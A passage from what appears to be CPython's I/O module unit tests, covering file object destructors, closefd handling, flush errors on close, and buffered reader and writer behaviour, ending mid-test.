class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(support.TESTFN, "w"))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2 GiB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default limited RawIOBase.read(n) implementation (which
# calls readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
def test_invalid_newline(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
read1 = read
stream = Stream()
for method in ("readinto", "readinto1"):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b"12345")
def test_fspath_support(self):
def check_path_succeeds(path):
with self.open(path, "w") as f:
f.write("egg\n")
with self.open(path, "r") as f:
self.assertEqual(f.read(), "egg\n")
check_path_succeeds(FakePath(support.TESTFN))
check_path_succeeds(FakePath(support.TESTFN.encode('utf-8')))
with self.open(support.TESTFN, "w") as f:
bad_path = FakePath(f.fileno())
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(None)
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(FloatingPointError)
with self.assertRaises(FloatingPointError):
self.open(bad_path, 'w')
# ensure that refcounting is correct with some error conditions
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(FakePath(support.TESTFN), 'rwxa')
def test_RawIOBase_readall(self):
# Exercise the default unlimited RawIOBase.read() and readall()
# implementations.
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.read(), b"abcdefg")
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.readall(), b"abcdefg")
def test_BufferedIOBase_readinto(self):
# Exercise the default BufferedIOBase.readinto() and readinto1()
# implementations (which call read() or read1() internally).
class Reader(self.BufferedIOBase):
def __init__(self, avail):
self.avail = avail
def read(self, size):
result = self.avail[:size]
self.avail = self.avail[size:]
return result
def read1(self, size):
"""Returns no more than 5 bytes at once"""
return self.read(min(size, 5))
tests = (
# (test method, total data available, read buffer size, expected
# read size)
("readinto", 10, 5, 5),
("readinto", 10, 6, 6), # More than read1() can return
("readinto", 5, 6, 5), # Buffer larger than total available
("readinto", 6, 7, 6),
("readinto", 10, 0, 0), # Empty buffer
("readinto1", 10, 5, 5), # Result limited to single read1() call
("readinto1", 10, 6, 5), # Buffer larger than read1() can return
("readinto1", 5, 6, 5), # Buffer larger than total available
("readinto1", 6, 7, 5),
("readinto1", 10, 0, 0), # Empty buffer
)
UNUSED_BYTE = 0x81
for test in tests:
with self.subTest(test):
method, avail, request, result = test
reader = Reader(bytes(range(avail)))
buffer = bytearray((UNUSED_BYTE,) * request)
method = getattr(reader, method)
self.assertEqual(method(buffer), result)
self.assertEqual(len(buffer), request)
self.assertSequenceEqual(buffer[:result], range(result))
unused = (UNUSED_BYTE,) * (request - result)
self.assertSequenceEqual(buffer[result:], unused)
self.assertEqual(len(reader.avail), avail - result)
def test_close_assert(self):
class R(self.IOBase):
def __setattr__(self, name, value):
pass
def flush(self):
raise OSError()
f = R()
# This would cause an assertion failure.
self.assertRaises(OSError, f.close)
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
# Issue #25455
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b) # Should not crash
except RuntimeError:
pass
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
def test_buffer_freeing(self) :
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"", bufio.read1(0))
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
def test_read1_arbitrary(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"bc", bufio.read1())
self.assertEqual(b"d", bufio.read1())
self.assertEqual(b"efg", bufio.read1(-1))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1())
self.assertEqual(rawio._reads, 4)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
@unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading different, so that
# checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends into gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
